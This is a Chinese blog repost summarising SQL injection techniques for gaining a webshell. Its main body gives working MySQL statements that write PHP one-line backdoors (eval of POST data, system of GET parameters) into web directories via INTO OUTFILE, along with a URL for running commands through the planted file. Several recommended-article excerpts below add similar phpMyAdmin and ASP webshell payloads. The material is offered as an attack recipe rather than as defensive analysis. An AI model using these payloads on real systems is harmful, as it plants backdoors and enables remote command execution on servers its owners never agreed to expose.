SQL 注入自我总结

最新推荐文章于 2025-08-22 22:06:21 发布
最新推荐文章于 2025-08-22 22:06:21 发布
阅读量78 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php python shell
原文链接:https://my.oschina.net/richardx/blog/54564
本文介绍了通过SQL注入获取WebShell的几种方法,包括利用创建表及插入文件等手段实现远程代码执行,并展示了如何使用SQL查询直接导出用于执行远程命令的一句话木马。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

2019独角兽企业重金招聘Python工程师标准>>> hot3.png

早先是看过JHACKJ后台拿shell的方法:


Create TABLE st4dy (cmd text NOT NULL);
Insert INTO st4dy (cmd) VALUES('<?php eval($_POST[cmd])?>');
select cmd from study into outfile 'E:/wamp/www/7.php';

Drop TABLE IF EXISTS study;


Create TABLE `wangzi` (`wangzi` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `wangzi` ( `wangzi` ) VALUES ('<?php @system($_GET[cmd]);?>');
Select `wangzi` FROM `wangzi` INTO OUTFILE 'C:/xampp/htdocs/xampp/cmd.php'; Drop TABLE `wangzi`;
--------------------------------------------------------------------------

而后在国外论坛上看到一老外的方法更简单:

1:select load_file('E:/xamp/www/st4dy.php');

2:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/st4dy.php'
然后访问网站目录: http://localhost/st4dy.php?cmd=dir

3:写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/st4dy.php'

第三个是直接在SQL查询里导出一句话,必须要先知道网站的路

转载于:https://my.oschina.net/richardx/blog/54564

2022年全国职业院校技能大赛网络安全赛卷(中职组)卷3
yuhongkui的专栏
04-01 6434
2022年全国职业院校技能大赛(中职组) 网络安全竞赛试题 (3) (总分100分) 赛题说明 一、竞赛项目简介 “网络安全”竞赛共分A.基础设施设置与安全加固;B.网络安全事件响应、数字取证调查和应用安全;C.CTF夺旗-攻击;D.CTF夺旗-防御等四个模块。根据比赛实际情况,竞赛赛场实际使用赛题参数、表述及环境可能有适当修改,具体情况以实际比赛发放赛题为准。竞赛时间安排和分值权重见表1。 表1 竞赛时间安排与分值权重 模块编号 模块名.
PHP爆绝对路径方法
qax
10-06 1241
1、单引号爆路径 说明: 直接在URL后面加单引号,要求单引号没有被过滤(gpc=off)且服务器默认返回错误信息。 www.xxx.com/news.php?id=149′ 2、错误参数值爆路径 说明: 将要提交的参数值改成错误值,比如-1。-99999单引号被过滤时不妨试试。 www.xxx.com/researcharchive.php?id=-1 3、Google爆路径 说明: 结合关键字和site语法搜索出错页面的网页快照,常见关键字有warning和fatal error。注意,如果目标站点
2022年全国职业院校技能大赛(中职组)网络安全竞赛试题(3)
君逍遥o
05-11 406
2022年全国职业院校技能大赛(中职组)网络安全竞赛试题(3)
phpmyadmin后台4种拿shell方法及php爆路径收集
weixin_30367873的博客
08-31 1268
php后台拿shell要知道php的路径,文章下将讲诉爆php路径的方法!!! 方法一: CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>'); SE...
数据库命令执行Getshell
m0_53087192的博客
01-19 1040
Access导出 Access可导出xxx等文件需要配合解析漏洞 create table cmd (a varchar(50)); insert into cmd (a) values ('一句话木马') #一句话木马如:<%execute request(1)%> select * into [a] in 'e:\web\webshellcc\1.asa;x.xls' 'excel 4.0;' from cmd drop table cmd 菜刀直连https://www.xxx.c
SQL注入攻击实验报告
05-07
### SQL注入攻击实验报告知识点详解 #### 一、实验背景及目的 - **实验背景**:随着互联网技术的发展,Web应用程序越来越广泛地应用于各种场景之中。然而,由于开发者对安全性的忽视,使得许多Web应用程序存在安全...
concat mysql sql注入_sql注入总结(一)--2018自我整理
weixin_42516040的博客
12-29 335
SQL注入总结前言:本文和之后的总结都是进行总结,详细实现过程细节可能不会写出来~所有sql语句均是mysql数据库的,其他数据库可能有些函数不同,但是方法大致相同0x00 SQL注入原理:SQL注入实质上是将用户传入的参数没有进行严格的处理拼接sql语句的执行字符串中。可能存在注入的地方有:登陆页面,搜索,获取HTTP头的信息(client-ip , x-forward-of),订单处理(二次注...
SQL注入漏洞的检测及防御方法_如何测试sql注入漏洞(1),阿里面试官必问
2201_75863152的博客
04-18 378
最重要的是,保持对新的安全威胁和最佳实践的了解,以及定期审查和改进应用程序的安全性。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。OWASP ZAP:开源的漏洞扫描工具,包括SQL注入检测功能,是OWASP项目的一部分。SQLMap:专门用于检测和利用SQL注入漏洞的工具,具有强大的功能和选项。
SQL注入漏洞的检测及防御方法_如何测试sql注入漏洞
2301_82242459的博客
04-12 1427
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。错误信息处理:避免将详细的数据库错误信息暴露给用户。
【MyBatis 1】SQL注入
2401_84046677的博客
04-18 1017
至此,文章终于到了尾声。技术能力:先写岗位所需能力,再写加分能力,不要写无关能力;项目经历:只写明星项目,描述遵循 STAR 法则;简历印象:简历遵循三大原则:清晰,简短,必要,要有的放矢,不要海投;以及最后为大家准备的福利时间:简历模板+Java面试题+热门技术系列教程视频《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!列教程视频[外链图片转存中…(img-PzLybdSI-1713400836427)]
2019年度中职组“网络空间安全”赛项赣州市竞赛任务书B卷
旺仔Sec&blog
12-22 3719
1. 进入虚拟机操作系统:BT5中的/root目录,完善该目录下的land.py文件,填写该文件当。2. 进入虚拟机操作系统:BT5中的/root目录,完善该目录下的land.py文件,填写该文件当。3. 进入虚拟机操作系统:BT5中的/root目录,完善该目录下的land.py文件,填写该文件当。4. 进入虚拟机操作系统:BT5中的/root目录,完善该目录下的land.py文件,填写该文件当。5. 进入虚拟机操作系统:BT5中的/root目录,完善该目录下的land.py文件,填写该文件当。
MySQL数据库渗透及漏洞利用总结
05-09 4526
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和W...
各种Getshell姿势总结
m0_53087192的博客
01-18 1664
一、进后台getshell 正常上传文件 直接上传一句话木马。 修改网站上传类型Getshell 修改网站上传类型,后台设置中添aasps|asp|php|jsp|aspx|asa|cer,保存后上传aasps文件,上传后为asp文件可以解析Getshll。 后台数据库备份Getshell 后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,比如通
phpMyAdmin后台拿Shell方法及php爆路径方法
热门推荐
u011500307的专栏
12-01 1万+
转自:http://kuxoo.com/phpMyAdmin/ [PhpMyAdmin后台拿Shell] CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL ); INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES (''); select xiaoma1 from xiaoma
应用安全-web安全-WebShell整理
weixin_30865427的博客
06-27 587
shellcode.aspx <%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %> <%@ Import Namespace="System" %> <%@ Import Namespace="System.Runtime.Int...
云计算学习100天-第25天
邪的专栏
08-20 896
mariadb(数据库客户端软件)、mariadb-server(数据库服务器软件)、mariadb-devel(依赖包)、php(识别php语言)、php-fpm(进程管理器服务)、php-mysqlnd(PHP的数据库扩展包)Fast-CGI是快速公共(通用)网关接口,可以连接如nginx等网站程序到网站的语言解释器(比如php) ,php-fpm进程使用了Fast-CGI解析动态网站页面。systemctl enable --now php-fpm #加入开机自启并立即启动。
拆解本地组策略编辑器 (gpedit.msc) 的界面和功能
最新发布
qq_39741838的博客
08-22 624
本地组策略编辑器(gpedit.msc)界面分为三部分:左侧导航窗格包含计算机配置(整机设置)和用户配置(个人设置);中间窗格显示具体策略状态;右侧窗格提供策略详情。计算机配置优先级高于用户配置,包含软件/Windows/安全设置等,用户配置则针对个人环境。配置时需定位策略、设置状态后刷新生效。常见应用包括禁用注册表编辑器、隐藏任务栏功能等。
PHP:历经岁月仍熠熠生辉的服务器端脚本语言
z18072129907的博客
08-21 667
在当今这个科技飞速发展、编程语言层出不穷的时代,PHP 就像一位久经沙场却依然充满活力的老将,在服务器端脚本语言的舞台上持续绽放着独特的光芒。尽管面临着众多新兴语言的挑战,PHP 凭借其深厚的历史底蕴、强大的功能和广泛的适用性,依然在 Web 开发领域占据着举足轻重的地位。
Pangolin:强大的SQL注入测试工具
总结来说,Pangolin是SQL注入测试的得力助手,具备高效、全面的特性,但需正确和合法地使用,避免滥用导致的法律风险。同时,Python作为通用编程语言,可以与Pangolin结合,实现各种自动化测试脚本,但请确保遵循...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值